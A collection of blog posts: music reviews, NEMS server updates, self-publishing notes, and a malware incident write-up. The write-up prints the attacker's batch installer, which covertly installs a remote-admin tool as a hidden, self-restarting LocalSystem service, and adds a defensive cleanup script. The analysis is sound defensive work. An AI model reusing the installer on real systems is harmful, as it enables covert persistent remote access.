Gareth Emery ft. Wayward Daughter – Reckless (BL3R Remix)

I. Love. This. Song!!

Some tracks just make my player warn me of permanent hearing damage, and this is one of them. When the bass comes in and my eardrums tingle, I know I’m where I want to be.

That beat drop at 1:24 and the subsequent synth squelches make me excited to be alive. And her voice… oh, her voice. Wayward Daughter shows us why Vocal Dubstep is the genre of choice for those of us who love and appreciate true melodic dubstep and talented vocal chops.

Gareth brings in the synth with old school frequency envelopes that seamlessly meld 2017 with 1998.

Enjoy! You can thank me later.

Bad SD cards in a NEMS Server Raspberry Pi

With the coming release of NEMS 1.3, the retroactive stats system was implemented to allow me a way to see how many systems have been upgraded, and if any are having trouble.

Now, behind the scenes, I also developed the anonymous stats system as a way for me to gauge system load on various platforms.

Why would I do that? Because NEMS is branching out onto other SBCs, starting with the ODROID XU4.

The fact remains, I often get the question “How many hosts can I add to NEMS” and the truth is, I have no idea! I’ve received great feedback from users who are monitoring 100+ hosts on a Raspberry Pi NEMS server, but otherwise I don’t really know much about what’s actually going on in the real world of NEMS.

So the stats system shows me, anonymously, how NEMS is being used, and how it is performing.

So, that system has been running for a few days, and today I began seeing some alerts: some users have bad SD cards!

This is causing their NEMS server to run very, very slowly.

If your NEMS server is running slowly, you may be one of these! Remember, the stats are anonymous, so I can’t contact you.

I’ve considered making the stats system able to send back a response to your NEMS server… that way, even though it’s anonymous and I don’t know who you are, I can have the system programmatically warn you that your card is failing.

It’s really quite cool for me to see how NEMS is being used. So far more than 100 NEMS servers have reported in with their current statistics, and many are running more than 100 Nagios monitors with a 0.01 load average.

So back to my comment about branching out to other SBCs and knowing how many hosts we can handle on NEMS: the fact is, now that I will have real world statistical data, I will be able to put together proper information about how many services can be running on NEMS on various platforms! It’ll start with the Pi 3 obviously, but I’ll be able to see for example, how a NEMS server with 500 hosts has a higher load than one with 100, so we can therefore recommend if you have 500 hosts or more, you should install on an ODROID XU4 (for example). I’ll also be creating new graphs that show comparisons of various platforms, performance graphs over time, averages based on user deployments, and so-on. Really exciting stuff!

Thanks for using NEMS! If you have any questions, I’m here for you!

Robbie

A nasty piece of work in C:\ProgramData\WindowsWork

I encountered a nasty bit of malware today which wasn’t being seen by antivirus. Malwarebytes was popping up every 5 seconds with a warning that some executable file on Windows 10 was trying to reach a blocked web site… tektonit.ru

A quick Google search made it clear that the domain being contacted is associated with the Troj/RemAdm-AG and Backdoor.Gussdoor trojans, the second of which opens a backdoor to the domain in question. The attacker then has access to read and write files, access the registry, spawn processes and even take screenshots. In our case, they also installed keylogger.bestfreekeylogger.a which lets them record keystrokes like passwords, credit card numbers, emails, or any other content entered via the computer.

Nasty.

The user had both a McAfee antivirus product and Avast Free installed. Neither of which were really complaining about the threat, yet Malwarebytes continued its little dance in the corner “Website blocked – Domain: tektonit.ru” and variants thereof.

Malwarebytes also did something else nice for me: it showed the process location. It was running a file in C:\ProgramData\WindowsWork, which to an end-user appears to not exist if you try to navigate to it.

I installed ESET Internet Security, which picked up and removed the keylogger (two variants) that the other applications left behind, but the malware reaching out to the attacking server was not detected.

Jumping into an admin terminal, the directory doesn’t show since its attributes are set to +s +h (system, hidden); a plain dir skips system and hidden entries, and only dir /a or attrib lists them. Within the folder, the files themselves are also hidden and set with the system attribute, making them pretty much invisible to end users. And strangely, antivirus also did not see it.

Removing the attributes, I was now able to see and open the files. One such file was the installer used to deploy the malware.

Here’s how it installed itself:

@echo off
attrib +s +h "C:\ProgramData\WindowsWork"
cd C:\ProgramData\WindowsWork\
 
sc stop RManService
sc stop ServiceWork
sc delete RManService
sc delete ServiceWork
taskkill /im rfusclient.exe /f
taskkill /im rutserv.exe /f
reg delete "HKLM\SYSTEM\System Information\Driver" /f
 
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
"C:\ProgramData\WindowsWork\syswork.exe" /silentinstall
"C:\ProgramData\WindowsWork\syswork.exe" /firewall
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
sc failure ServiceWork reset= 0 actions= restart/1000/restart/1000/restart/1000
sc config ServiceWork obj= LocalSystem type= interact type= own
"C:\ProgramData\WindowsWork\syswork.exe" /start
 
del C:\ProgramData\WindowsWork\config_set.reg /q
del C:\ProgramData\WindowsWork\WinUpdate.exe /q
del C:\ProgramData\WindowsWork\WorkInstall2.bat /q
attrib +s +h "C:\ProgramData\WindowsWork\*.*"
del C:\ProgramData\WindowsWork\WorkInstall.bat /q
 
exit

Interesting, in that this now sheds some light on why antivirus isn’t picking it up… it’s likely not even a virus. The names in the script give it away: rutserv.exe, rfusclient.exe and the RManService service belong to Remote Manipulator System (RMS), a commercial remote-administration tool made by TektonIT, the owner of the very domain Malwarebytes was blocking. That is why vendors file it under “RemAdm” (remote admin) riskware rather than as a trojan, and why two antivirus products let it run. And to boot, UAC would have stopped this script from running, which means the end user had to have allowed it. Once again proves my point that Windows UAC is useless because novice users will just say yes to any stinking dialogue you throw at them!

So the script, as you can see, first stops and deletes any earlier copy of the tool’s own services (RManService is the tool’s stock service name; ServiceWork is a renamed instance), kills its processes and clears its registry key, then reinstalls it as ServiceWork running as LocalSystem with permission to interact with the desktop, configured to restart itself one second after any failure, and finally hides its own files and deletes the installer. None of those are stock Windows services, but a renamed service wrapping a legitimate remote-admin tool is tough to tell apart from something that belongs there.

I killed the services, deleted the services, and then purged all the files in the C:\ProgramData\WindowsWork\ and removed the folder. Instantly, Malwarebytes went to sleep.

A reboot and full system scan as administrator with ESET Internet Security, and all looks well. Hopefully the firewall in EIS will do a better job of keeping the user from answering “Yes” to the wrong questions… but ultimately it’s up to educating users to think, and understand, before clicking.
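As an added example (not from the original post, and not code from Malwarebytes, ESET or TektonIT), here is the same hunt and cleanup as a PowerShell script. It checks only the indicators visible in the installer above: the hidden folder, the two service names, the process names, and the registry key the installer clears. The extra process name syswork is an assumption, since the script only shows syswork.exe being run as the installer. Everything is report-only unless -Remove is given, and the cleanup needs an elevated PowerShell, exactly as the installer needed administrator rights to run.

```powershell
# Added example: hunt for (and optionally remove) the indicators left by the
# WorkInstall.bat installer shown above. Run from an elevated PowerShell.
# Without -Remove the script only reports what it finds.
param([switch]$Remove)

$dir      = 'C:\ProgramData\WindowsWork'
$services = 'RManService', 'ServiceWork'
$procs    = 'rutserv', 'rfusclient', 'syswork'   # syswork is an assumption
$regKey   = 'HKLM:\SYSTEM\System Information\Driver'

$found = $false

# 1. The folder and its files carry +s +h, so listing them needs -Force
#    (the cmd equivalent is dir /a; a plain dir hides them).
if (Test-Path -LiteralPath $dir) {
    $found = $true
    $attrs = (Get-Item -LiteralPath $dir -Force).Attributes
    Write-Host "[!] $dir exists (attributes: $attrs)"
    Get-ChildItem -LiteralPath $dir -Force -Recurse | ForEach-Object {
        Write-Host ("    {0,-30} {1,10} bytes  {2}" -f $_.Name, $_.Length, $_.Attributes)
    }
}

# 2. Services the installer (re)creates. Show the account it runs as and the
#    restart-on-failure actions that were configured with sc failure.
foreach ($name in $services) {
    $svc = Get-CimInstance Win32_Service -Filter "Name='$name'" -ErrorAction SilentlyContinue
    if ($svc) {
        $found = $true
        Write-Host "[!] service $name state=$($svc.State) account=$($svc.StartName)"
        Write-Host "    binary: $($svc.PathName)"
        sc.exe qfailure $name | Select-String 'RESTART' | ForEach-Object { Write-Host "    $_" }
    }
}

# 3. Processes belonging to the same tool.
Get-Process -Name $procs -ErrorAction SilentlyContinue | ForEach-Object {
    $found = $true
    Write-Host "[!] process $($_.ProcessName) pid=$($_.Id) path=$($_.Path)"
}

# 4. Registry key the installer deletes before reinstalling.
if (Test-Path -LiteralPath $regKey) {
    $found = $true
    Write-Host "[!] registry key present: $regKey"
}

if (-not $found) {
    Write-Host '[+] none of the indicators are present'
    return
}

if ($Remove) {
    # Same order the author used by hand: kill processes, stop and delete the
    # services, strip the system/hidden attributes, then purge the folder.
    Get-Process -Name $procs -ErrorAction SilentlyContinue | Stop-Process -Force
    foreach ($name in $services) {
        if (Get-Service -Name $name -ErrorAction SilentlyContinue) {
            Stop-Service -Name $name -Force -ErrorAction SilentlyContinue
            sc.exe delete $name | Out-Null
        }
    }
    if (Test-Path -LiteralPath $dir) {
        attrib.exe -s -h "$dir\*.*" /s /d
        attrib.exe -s -h "$dir"
        Remove-Item -LiteralPath $dir -Recurse -Force
    }
    Write-Host '[+] removed; reboot and run a full scan before trusting the machine'
}
```

The report step is worth running before the cleanup because the service’s PathName and the failure actions tell you whether you are looking at the renamed ServiceWork instance from this installer or at some other deployment of the same tool, and because the process path confirms the binary really lives in the hidden folder rather than somewhere the script does not touch.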

The malware is gone. However, there’s no way to know how far the attacker got. It appears as though the service files were not viruses at all, but rather basic programs that reach out to tektonit.ru and give the attacker a channel to fetch the actual malware and install it. Basically, the stuff in C:\ProgramData\WindowsWork\, which the user authorized being installed, was benign from an antimalware standpoint. It was not a virus: it was a tool being used by an attacker to propagate their tools, malware and possibly viruses/trojans. But because of the nature of it, it also worked as a bit of a smokescreen.

In this instance, had Malwarebytes’ Premium version not been installed (which does active protection, not just on-demand scanning), the user would have been wide open to the smokescreen application and its desire to install all kinds of unknowns on the user’s system.

ESET Internet Security is now installed, along with Malwarebytes Premium. These two products combined should provide about the best level of protection available to Windows users today.

Get ESET Internet Security: https://cat5.tv/esetus

Get Malwarebytes Premium: http://amzn.to/2x2HCz2

My Wife, The Author: My Adventures in Book Publication

When my wife and I married in 2001, I knew she had a passion for writing.

One of the first things she wrote was an account of our love story, and how we met on ICQ; one of the early instant messenger apps before MSN, Facebook or Twitter existed. To allow her to have a printed copy of the account, called I Seek You, I taught myself how to use Cafepress, and I began my first quest at self-publication.

Then, 2006 came around, which brought about the culmination of several years’ work for Bekah. Having teamed up with her sister, Abigail, her first full-length novel, Weeping Willow, was released, followed in the same year by her independent novel set in Toronto, The Starfish. To make it possible, I’d used what I had learned to publish them both via CafePress, and two beautiful new paperbacks with my wife’s name on their spine adorned our book shelf… later followed by another, another, and yet another.

Throughout the process over the years, I was able to establish ourselves with Library and Archives Canada, basically making us an “official” Canadian book publishing company. One of the coolest features of this affiliation is that I could now issue my own ISBN and later, ISBN-13 codes. In other words, I didn’t have to pay someone else a hefty fee to register Bekah’s books, and we could now print our own barcodes which allowed us to sell them.

So that’s a quick bit of backstory for you as to how I got into self-publishing novels. I’ve personally grown and evolved my abilities, and am always, for the sake of my wife’s readers, working hard to make our publications as professional looking as possible.

By the time Bekah was ready to release her biggest release to date, A White Rose in 2012, I’d been able to really step things up in the publishing department, doing away with CafePress entirely, and working directly with what we called the “world’s biggest book store” at the time, Amazon. Suddenly, not only were Bekah’s books available for purchase all around the world through Amazon’s family of sites, but also available on their Kindle e-reader. The printing itself is done through a child company of Amazon called CreateSpace.

Side Note: I’ll say now, self-publication is not for everyone. If you’re reading this and thinking “Wow, I can publish my own books with these sites,” you should know it has taken 11 years for me, a teacher of tech and full-time tech industry worker, to learn the ins-and-outs of the process, and to get to the quality of publication that I am at today. Maybe one day, someone will request that I edit and publish their book for them. That’d be cool. In all honesty, the bill would be at least $2,000 to do it, just for the labor. Hope that gives you an idea of how much work is actually involved.

So, this month, August 2017, is another big one for our “publishing house”, called Rock of Ages Publishing House, named after the popular online radio station I founded and ran for many years in the early days of online radio.

After countless hours, we have released not one, but two new novels this month.

The first is Bekah’s newest and proudest work, When The Fog Cleared. We call it a Christian Romance as far as genres are concerned, but Bekah’s very “non-preachy” approach to faith is truly unmatched. It’s not, in my opinion, a Christian Romance in the traditional sense, but rather, a beautiful romance and story of true love, involving a Christian character. If you’ve read Bekah’s books before, you already know she creates characters who you feel you know like a real person. The people in her book are so real to the reader, it’s kinda mind-blowing. You’ve got to read it.

The second is another joint effort, this time with her other sister, Rachel Xu. And it’s a long time coming! They finished writing it in 2014, and I’ve finally been able to edit and publish it. This one is a Mainstream Fantasy. Creatures, wild things, and a Gothic mansion. Need I say more? The Attic is such a fun read that you will definitely want to get the paperback just so you can keep it on your bookshelf or share it with friends.

So how did I publish two novels in just one month?

I locked in. Many, many hours with my Rebel BTs, my playlist, and my laptop computer. I did everything using open source software. The GIMP was used to create all the cover art, and I used LibreOffice Writer to actually create the layouts and files. That bit was brutal… figuring out margins and pagination, making sure you have the book or author name at the top of the appropriate pages, but not at the top of chapter pages. I even took special care to ensure there was just enough room at the edge of the page that your fingers wouldn’t obstruct the text, and just a bit more near the binding to ensure the text doesn’t run into the fold. It was a lot of work to set up. But I did it all for When The Fog Cleared. Then, having gotten through that novel, I took the files I had created and imported the text for The Attic, which was long overdue for public release. Recycling the same layouts, the same master files, and the same dimensions, saved hours upon hours of work, and gave me a very good looking layout (as I’d spent so much time creating the format). I then did all the edits from our notes, reformatted the break point artwork, and through an onerous process of back and forth with the editors, I was able to complete our second publication this month.

I hope you love both novels, and can’t wait to start seeing your (5/5?) reviews on Amazon! Thanks for reading!

Robbie

WHEN THE FOG CLEARED – http://amzn.to/2etypZf
When Kylie Cadore arrived at her father’s Georgian home in Bermuda for a summer vacation, she wasn’t expecting to find his common-law wife, Pearl, hiding a mysterious illness from him. And a handsome cousin. Having journeyed to the island after several months of separation from her husband, Drew, Kylie hoped to gain clarity amidst the palm trees and sandy shores. Instead she found herself drawn like a magnet to the charms of Pearl’s cousin, a cruise ship pianist. When Drew unexpectedly shows up on the island a couple of weeks later, Kylie’s heart is torn between the prospect of a new romance, and still loving the man who broke her heart.

THE ATTIC – http://amzn.to/2wmR5jE
When Lily Kline takes possession of a Gothic estate with Ian Hawke, her co-heir and a stranger, she soon realizes there is more than meets the eye within the many corridors of the sequestered mansion. Ian is aloof and even hostile at times, and though he warns about rabid wolves in the forest, as though trying to frighten her away, she can’t help being drawn to him. As events grow more bizarre, she questions her safety and Ian’s identity. Why did her late Grandfather see fit to make them co-heirs? Furthermore, what lurks in the attic, that hidden room everyone takes pains for her to avoid?

The Eden Project – Lost

I know, I know… I seem to be on an Eden kick. But like John 3:16, there’s a lot of power in Lost 3:16. 😉  Heh.  Yeah, skip to 3m16s and you’ll see what I mean. That bit keeps me coming back again and again. Then, at 3:46 I basically melt. I can’t stop looping this track. I have to admit, I’m digging The Eden Project big time.

Mako – Way Back Home (WE ARE FURY Remix)

One thing that always gets me is really. tight. harmonies. Mako had it on the original of Way Back Home, but I wanted something with a bit more intensity (it’s a pretty mellow track). Enter Trap Nation with the WE ARE FURY remix of Mako’s classic.

Take the intense harmonies of the original track, bring in a breakbeat, dubstep vocal chops, and an epic battle style for something I just can’t listen to without my phone warning me that “Listening at high volume for a long time may damage your hearing.”

That said, the original still gives me goosebumps.

Birdy – Skinny Love (Vanic Remix)

Time to turn up your speakers! This is a great remix. It’s a 5-minute crescendo that doesn’t stop oozing awesomesauce. Just when you think it’s starting to drip, Vanic turns back on the tap. Birdy has a great vocal, and the bassline build coupled with the unexpected (but oh, so welcome) dubstep breakdown makes it impossible for me to turn off the repeat feature.

For those interested in a little history lesson, here’s the original version of the song.

Why support may ask for your backup.nems file, and why you should never share it with others

During support sessions I often request either SSH access or a copy of the user’s backup.nems file. SSH access, it should be obvious, should not be shared with just anyone. Also, you should never, ever, ever, open SSH to the world on your NEMS server if you have not yet initialized it. This is because there are botnets that look for Raspberry Pi computers which use the default “raspberry” password, and then compromise them.